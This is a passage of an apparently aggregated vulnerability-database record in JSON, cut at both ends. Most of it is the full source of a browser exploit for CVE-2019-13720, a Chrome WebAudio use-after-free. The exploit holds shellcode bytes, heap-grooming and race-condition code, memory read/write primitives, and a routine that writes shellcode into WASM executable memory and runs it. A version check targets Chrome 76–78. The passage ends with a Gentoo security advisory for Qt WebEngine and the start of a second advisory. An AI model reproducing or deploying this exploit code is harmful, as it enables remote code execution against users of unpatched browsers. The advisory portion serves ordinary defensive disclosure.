0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);\nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.\nlet GcPreventer = [];\nlet IIRFilters = [];\nvar SharedAudioCtx = undefined;\nlet FeedforwardSuperPageMetadata = undefined;\nlet OutputFloatArray = new Float32Array(10);\nlet MutableFreeListAudioBufs = [];\nlet DoubleAllocAudioBufs = [];\nlet ImageDataArray = [];\nconst EnableDebug = true;\nconst AlertOutput = false;\nvar HelperBuf = new ArrayBuffer(8);\nvar HelperDbl = new Float64Array(HelperBuf);\nvar HelperDword = new Uint32Array(HelperBuf);\nvar HelperBigInt = new BigUint64Array(HelperBuf);\nvar HelperUint8 = new Uint8Array(HelperBuf);\n\nfunction DebugLog(Message) {\n if(EnableDebug) {\n if(AlertOutput) {\n alert(Message);\n }\n else {\n console.log(Message); // In IE, console only works if devtools is open.\n }\n }\n}\n\nfunction Sleep(delay) {\n return new Promise(resolve => setTimeout(resolve, delay))\n}\n\nfunction ReverseBigInt(Val) {\n let ReversedVal = BigInt(0);\n let TempVal = Val;\n\n for (let i = 0; i < 8; i++) {\n ReversedVal = ReversedVal << BigInt(8);\n ReversedVal += TempVal & BigInt(0xFF);\n TempVal = TempVal >> BigInt(8);\n }\n\n return ReversedVal;\n}\n\nfunction ClearBigIntLow21(Val) {\n let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111\n let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000\n return ClearedVal;\n}\n\nlet GetSuperPageBase = ClearBigIntLow21;\n\nfunction GetSuperPageMetadata(LeakedPtr) {\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\n return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page\n}\n\nfunction GetPartitionPageIndex(LeakedPtr) {\n let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);\n let Index = (LeakedPtr & Low21Mask) >> BigInt(14);\n return Index;\n}\n\n\nfunction GetPartitionPageMetadata(LeakedPtr) {\n let Index = GetPartitionPageIndex(LeakedPtr);\n let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));\n return partitionPageMetadataPtr;\n}\n\nfunction GetPartitionPageBase(LeakedPtr, Index) {\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\n let PartitionPageBase = SuperPageBase + (Index << BigInt(14));\n return PartitionPageBase;\n}\n\nfunction GC() {\n let MyPromise = new Promise(function(GcCallback) {\n let Arg;\n \n for (var i = 0; i < 400; i++) {\n new ArrayBuffer(1024 * 1024 * 60).buffer;\n }\n \n GcCallback(Arg);\n });\n \n return MyPromise;\n}\n\n/*\nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:\n00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????\n*/\n\nfunction LeakQword(FreeListHead, TargetAddress) {\n FreeListHead[0] = TargetAddress;\n let TempVal = new BigUint64Array;\n TempVal.buffer;\n GcPreventer.push(TempVal);\n return ReverseBigInt(FreeListHead[0]);\n}\n \nfunction WriteQword(FreeListHead, TargetAddress, Val) {\n FreeListHead[0] = TargetAddress;\n let TempVal = new BigUint64Array(1);\n TempVal.buffer;\n TempVal[0] = Val;\n GcPreventer.push(TempVal);\n}\n\nfunction CreateWasmJITExport() {\n /*\n After this function returns, a new region of memory will appear with a\n single system page of 0x1000 bytes set to RWX for the JIT region for\n this WASM module\n \n 0x00000ACDB6790000:0x40000000 | Private\n 0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory\n 0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory\n */\n \n var ImportObj = { imports: { imported_func: arg => console.log(arg) } };\n const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n const WasmCode = new Uint8Array(WasmModuleBytes);\n const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);\n return WasmModule.exports.exported_func;\n}\n\n/*\nstruct __attribute__((packed)) SlotSpanMetadata {\n unsigned long freelist_head;\n unsigned long next_slot_span;\n unsigned long bucket;\n uint32_t marked_full : 1;\n uint32_t num_allocated_slots : 13;\n uint32_t num_unprovisioned_slots : 13;\n uint32_t can_store_raw_size : 1;\n uint32_t freelist_is_sorted : 1;\n uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);\n uint16_t in_empty_cache : 1;\n uint16_t empty_cache_index : 7;\n uint16_t unused2 : (16 - 1 - 7);\n};\n\nstruct PartitionPage {\n union {\n struct SlotSpanMetadata span;\n size_t raw_size;\n struct PartitionSuperPageExtentEntry head;\n struct {\n char pad[32 - sizeof(uint16_t)];\n uint16_t slot_span_metadata_offset;\n };\n };\n};\n\nstruct PartitionBucket {\n unsigned long active_slot_spans_head;\n unsigned long empty_slot_spans_head;\n unsigned long decommitted_slot_spans_head;\n uint32_t slot_size;\n uint32_t num_system_pages_per_slot_span : 8;\n uint32_t num_full_slot_spans : 24;\n};\n*/\n\nfunction HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {\n for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {\n SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct\n HelperBigInt[0] = SlotSpanMetaAddress;\n DebugLog(\"... targetting slot span metadata at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);\n HelperBigInt[0] = BucketAddress;\n DebugLog(\"... leaked bucket address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n \n if(BucketAddress != BigInt(0)) {\n BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size\n BucketSize = LeakQword(FreeListHead, BucketAddress);\n HelperBigInt[0] = BucketSize;\n DebugLog(\"... leaked bucket size is \" + HelperDword[1].toString(16) + \" \" + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n \n if(HelperDword[0] == SlotSize) {\n DebugLog(\"... found desired slot size! Reading freelist head for SlotSpan...\");\n SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct\n HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);\n DebugLog(\"... leaked slot span freelist address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\n return HelperBigInt[0];\n }\n }\n }\n}\n\nfunction ExecutePayload(FreeListHead) {\n var WasmExport = CreateWasmJITExport();\n let FileReaderObj = new FileReader;\n let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment\n \n DebugLog(\"... WASM module and FileReader created.\");\n FileReaderObj.onerror = WasmExport;\n let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\n\n if (!FileReaderLoaderPtr) {\n DebugLog(\"... failed to obtain free list head for bucket size 0x140 slot span\");\n return;\n }\n \n HelperBigInt[0] = FileReaderLoaderPtr;\n DebugLog(\"... estimated a FileReaderLoader alloc address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent\n let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\n \n if(ValidationPtr != FileReaderLoaderPtr) {\n HelperBigInt[0] = ValidationPtr;\n DebugLog(\"... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n\n let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));\n let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);\n let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);\n let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));\n let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));\n let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);\n let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);\n let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);\n let StubAddrFieldOffset = undefined;\n\n switch (MajorVersion) {\n case 77:\n StubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n break;\n case 76:\n StubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n break\n }\n \n let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);\n HelperBigInt[0] = RwxJitStubPtr;\n DebugLog(\"... resolved JIT stub address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n\n for(var x = 0; x < Egghunter.length; x += 8) {\n JitChunkAddress = RwxJitStubPtr + BigInt(x);\n HelperBigInt[0] = JitChunkAddress;\n //DebugLog(\"... writing chunk of egghunter shellcode at offset \" + x.toString(10) + \" to JIT region at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n \n for(var y = 0; y < 8; y++) {\n HelperUint8[y] = Egghunter[x + y];\n }\n \n WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);\n }\n \n HelperBigInt[0] = RwxJitStubPtr;\n DebugLog(\"... executing shellcode at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n WasmExport();\n }\n else {\n DebugLog(\"... failed to validate re-claim of FileReaderLoader slot at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n }\n}\n\nasync function PrePayloadHeapGroom() {\n DebugLog(\"... grooming heap in preparation for R/W primitive creation and payload execution...\");\n await GC();\n DoubleAllocAudioBufs = []; // These were the \"holders\" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. \n\n for (var j = 0; j < 80; j++) {\n MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));\n }\n\n // At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.\n \n IIRFilters = new Array(1);\n await GC();\n\n for (var j = 0; j < 336; j++) {\n ImageDataArray.push(new ImageData(1, 2));\n }\n \n ImageDataArray = new Array(10);\n await GC();\n\n for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {\n let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);\n if (MutableFreeListEntry[0] != BigInt(0)) {\n let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.\n let AllocCount = 0;\n MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);\n \n // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated\n \n do {\n GcPreventer.push(new ArrayBuffer(8));\n \n if (++AllocCount > 0x100000) {\n DebugLog(\"... failed to re-claim final free list flink with alloc spray\");\n return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed\n }\n } while (MutableFreeListEntry[0] != BigInt(0));\n \n // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).\n \n let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays.\n GcPreventer.push(FreeListHead);\n ExecutePayload(FreeListHead);\n return;\n }\n }\n\n return;\n}\n\nasync function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {\n let NumberOfChannels = 1;\n let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\n let ConvolverNode = TempAudioCtx.createConvolver();\n let Finished = false;\n\n // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)\n\n let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);\n let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);\n \n SmallUafBuf.getChannelData(0).fill(0);\n \n for (var i = 0; i < NumberOfChannels; i++) {\n var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);\n ChannelData[0] = FeedforwardAddress;\n }\n \n AudioBufferSourceNode.buffer = BigSourceBuf;\n ConvolverNode.buffer = SmallUafBuf;\n \n // Setup the audio processing graph and begin rendering\n\n AudioBufferSourceNode.loop = true;\n AudioBufferSourceNode.loopStart = 0;\n AudioBufferSourceNode.loopEnd = 1;\n AudioBufferSourceNode.connect(ConvolverNode);\n ConvolverNode.connect(TempAudioCtx.destination);\n AudioBufferSourceNode.start();\n \n TempAudioCtx.startRendering().then(function(Buf) {\n Buf = null;\n\n if (Finished) {\n TempAudioCtx = null;\n setTimeout(CallbackFunc, 200);\n return;\n } else {\n Finished = true;\n setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);\n }\n });\n \n while (!Finished) {\n ConvolverNode.buffer = null;\n await Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer\n\n if (Finished) {\n break;\n }\n\n for (let i = 0; i < IIRFilters.length; i++) {\n OutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. \n IIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray);\n\n if (OutputFloatArray[0] != 3.1415927410125732) {\n Finished = true;\n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/\"holding\" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. \n DoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000));\n AudioBufferSourceNode.disconnect();\n ConvolverNode.disconnect();\n return;\n }\n }\n\n ConvolverNode.buffer = SmallUafBuf;\n await Sleep(1);\n }\n}\n\nfunction InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) {\n SharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used)\n HelperBigInt[0] = LeakedFlinkPtr;\n DebugLog(\"... leaked free list ptr from ScriptNode audio handler at iteration \" + RenderCount.toString(10) + \": \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n HelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr);\n DebugLog(\"... Super page: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n FeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span.\n HelperBigInt[0] = FeedforwardSuperPageBase;\n DebugLog(\"... first Super Page in extent: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n HelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase);\n FeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit.\n IIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data.\n HelperBigInt[0] = IIRFilterFeedforwardAllocPtr;\n DebugLog(\"... IIRFilterFeedforwardAllocPtr: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\n DoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom);\n}\n\nasync function InfoleakUAF(CallbackFunc) { \n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. Wheen rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processsed data after it travels through the ConvolverNode and ScriptNode.\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\n let ConvolverNode = TempAudioCtx.createConvolver(); \n let ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel.\n let ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000);\n let OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); \n let Finished = false;\n let RenderCount = 0;\n\n ConvolverNode.buffer = ChannelBuf;\n AudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full\n\n AudioBufferSourceNode.loop = true;\n AudioBufferSourceNode.loopStart = 0;\n AudioBufferSourceNode.loopEnd = 1;\n\n ChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread\n AudioBufferSourceNode.connect(ConvolverNode);\n ConvolverNode.connect(ScriptNode);\n ScriptNode.connect(TempAudioCtx.destination);\n\n AudioBufferSourceNode.start();\n \n ScriptNode.onaudioprocess = function(Evt) {\n RenderCount++;\n for (let i = 0; i < 1; i++) {\n let ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer);\n\n for (let j = 0; j < ChannelInputBuf.length; j++) {\n /*\n Notably, it is not only the first frame of the input buffer which is checked for the leaked flink.\n There are 16384 frames (each the size of a Float32) copied into the input channel buffer each\n time this handler receives an event. Typically only 0-1 of these frames will contain a leaked \n flink freelist pointer.\n */\n\n if (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) {\n let TempHelperBigInt = new BigUint64Array(1);\n let TempHelperDword = new Uint32Array(TempHelperBigInt.buffer);\n \n TempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer\n TempHelperDword[1] = ChannelInputBuf[j + 1];\n \n let LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]);\n\n // Check QWORD from SharedAudioBuffer for a non-zero value\n \n if (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) {\n LeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region?\n }\n\n if (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) {\n // Valid leak: end the recursion cycle for this UAF and execute a callback\n \n Finished = true;\n Evt = null;\n AudioBufferSourceNode.disconnect();\n ScriptNode.disconnect();\n ConvolverNode.disconnect();\n setTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1);\n return;\n }\n }\n }\n }\n };\n\n TempAudioCtx.startRendering().then(function(Buf) {\n Buf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle\n\n if (!Finished) {\n Finished = true;\n InfoleakUAF(CallbackFunc);\n\n }\n });\n\n /*\n Attack the race condition which allows for a free list flink to be copied\n into the ScriptNode input channel buffer: the renderer thread is receiving\n data into the SharedBuffer in the Convolver, processing it, then copying\n it into the ScriptNode input channel until it is full (then the ScriptNode\n receives an event). The SharedBuffer must be freed precisely between the\n time when new data is received from the BufferSource, and the processed data\n is copied into the ScriptNode. Simply freeing the buffer will not work, \n since the next chunk of data from the BufferSource will not be placed into\n SharedBuffer if it is NULL. However, there is no check if SharedBuffer is\n NULL when the processed data it contains is copied into the ScriptNode input.\n */\n \n while (!Finished) {\n ConvolverNode.buffer = null;\n ConvolverNode.buffer = ChannelBuf;\n await Sleep(1); // 1ms\n }\n}\n\nfunction FeedforwardHeapGroom() { \n let TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000);\n let FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data.\n let FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data.\n\n // Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory.\n\n FeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f\n FeedforwardArray[0] = 0; // Changing these feedforward values has no affect on memory at leaked ptr\n FeedforwardArray[1] = -1;\n\n for (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filtrs are creatd directly after page initialization.\n IIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray));\n }\n\n // Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causess an 0x240 slot span to be created in the first Super Page. \n\n let Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash.\n\n for(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span.\n TempConvolver = TempAudioCtx.createConvolver();\n AudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000);\n TempConvolver.buffer = AudioBuf;\n GcPreventer.push(AudioBuf);\n GcPreventer.push(TempConvolver);\n }\n\n // Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen.\n\n let Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance.\n\n for(var x = 0; x < (Bucket200Slots / 2); x++) {\n TempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size)\n GcPreventer.push(TempConvolver);\n }\n}\n\ntry {\n var BrowserVersion = navigator.userAgent.split(\"Chrome/\")[1].split(\" Safari/\")[0];\n MajorVersion = parseInt(BrowserVersion.substr(0, 2));\n \n if (MajorVersion <= 78) {\n ValidBrowser = true;\n\n if(MajorVersion != 76) {\n alert(\"This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version\");\n }\n }\n else {\n alert(\"CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser\");\n }\n}\ncatch (e) {\n DebugLog(\"... failed to parse browser version from user agent.\");\n}\n\nif(ValidBrowser) {\n FeedforwardHeapGroom();\n InfoleakUAF(InfoleakUAFCallback);\n}\nelse {\n DebugLog(\"... unsupported browser version \" + navigator.userAgent);\n}\n</script>\n</html>\n", "sourceHref": "https://0day.today/exploit/37719", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:02:10", "description": "### Background\n\nLibrary for rendering dynamic web content in Qt5 C++ and QML applications. \n\n### Description\n\nA use-after-free vulnerability has been found in the audio component of Qt WebEngine. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file in an application linked against Qt WebEngine, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Qt WebEngine users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-qt/qtwebengine-5.14.1\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-01T00:00:00", "type": "gentoo", "title": "Qt WebEngine: Arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2020-04-01T00:00:00", "id": "GLSA-202004-04", "href": "https://security.gentoo.org/glsa/202004-04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-17T18:59:29", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\nGoogle Chrome is one fast, simple, and secure browser for all your devices. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below 